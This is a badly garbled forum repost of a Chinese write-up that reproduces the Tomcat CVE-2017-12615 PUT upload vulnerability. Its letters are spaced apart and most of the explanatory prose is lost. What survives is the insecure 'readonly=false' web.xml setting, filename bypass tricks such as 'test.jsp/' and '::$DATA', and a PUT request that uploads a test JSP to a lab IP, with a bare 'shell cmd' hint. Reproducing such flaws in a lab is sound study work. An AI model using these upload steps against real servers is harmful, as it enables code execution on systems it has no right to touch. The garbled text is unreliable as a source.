[20906] 2017-09-21_CVE-2017-12615漏洞复现

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-18
2017-09-21_CVE-2017-12615漏洞复现 C V E - 2 0 1 7 - 1 2 6 1 5   L e m o n   L e m o n S e c   2 0 1 7 - 0 9 - 2 1 T o m c a t / 7 . 0 . 5 3 j a v a T o m c a t T o m c a t C A T A L I N A _ H O M E T O M C A T - H O M E C M D s t a r t u p t o m c a t c o n f w e b . x m l           < s e r v l e t >
f a l s e < i n i t - p a r a m >         < p a r a m - n a m e > r e a d o n l y < / p a r a m - n a m e >         < p a r a m - v a l u e > f a l s e < / p a r a m - v a l u e >   < / i n i t - p a r a m >   r e a d o n l y t r u e d e l e t e p u t r e a d o n l y f a l s e d e l e t e p u t p u t   j s p j s p x   w i n d o w s   a p a c h e - t o m c a t - 7 . 0 . 8 1         < s e r v l e t >                 < s e r v l e t - n a m e > d e f a u l t < / s e r v l e t - n a m e >                 < s e r v l e t - c l a s s > o r g . a p a c h e . c a t a l i n a . s e r v l e t s . D e f a u l t S e r v l e t < / s e r v l e t - c l a s s >                 < i n i t - p a r a m >                         < p a r a m - n a m e > d e b u g < / p a r a m - n a m e >                         < p a r a m - v a l u e > 0 < / p a r a m - v a l u e >                 < / i n i t - p a r a m >                 < i n i t - p a r a m >                         < p a r a m - n a m e > l i s t i n g s < / p a r a m - n a m e >                         < p a r a m - v a l u e > f a l s e < / p a r a m - v a l u e >                 < / i n i t - p a r a m >                 < l o a d - o n - s t a r t u p > 1 < / l o a d - o n - s t a r t u p >         < / s e r v l e t > r e a d o n l y         < s e r v l e t >                 < s e r v l e t - n a m e > d e f a u l t < / s e r v l e t - n a m e >                 < s e r v l e t - c l a s s > o r g . a p a c h e . c a t a l i n a . s e r v l e t s . D e f a u l t S e r v l e t < / s e r v l e t - c l a s s >                 < i n i t - p a r a m >                         < p a r a m - n a m e > d e b u g < / p a r a m - n a m e >                         < p a r a m - v a l u e > 0 < / p a r a m - v a l u e >                 < / i n i t - p a r a m >                 < i n i t - p a r a m >                         < p a r a m - n a m e > l i s t i n g s < / p a r a m - n a m e >                         < p a r a m - v a l u e > f a l s e < / p a r a m - v a l u e >                 < / i n i t - p a r a m >                                 < i n i t - p a r a m >                               < p a r a m - n a m e > r e a d o n l y < / p a r a m - n a m e >                               < p a r a m - v a l u e > f a l s e < / p a r a m - v a l u e >                       < / i n i t - p a r a m >                 < l o a d - o n - s t a r t u p > 1 < / l o a d - o n - s t a r t u p >         < / s e r v l e t > t e s t . j s p / t e s t . j s p / . t e s t . j s p : : $ D A T A t e s t . j s p / t e s t . j s p / . P U T   / t e s t . j s p /   H T T P / 1 . 1
< % o u t . p r i n t l n ( " t e s t " ) ; % > 访 g e t p u t P U T   / t e s t . j s p /   H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 1 3 5 . 1 3 2 : 8 0 8 0 C o n t e n t - L e n g t h :   2 5
s h e l l c m d
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则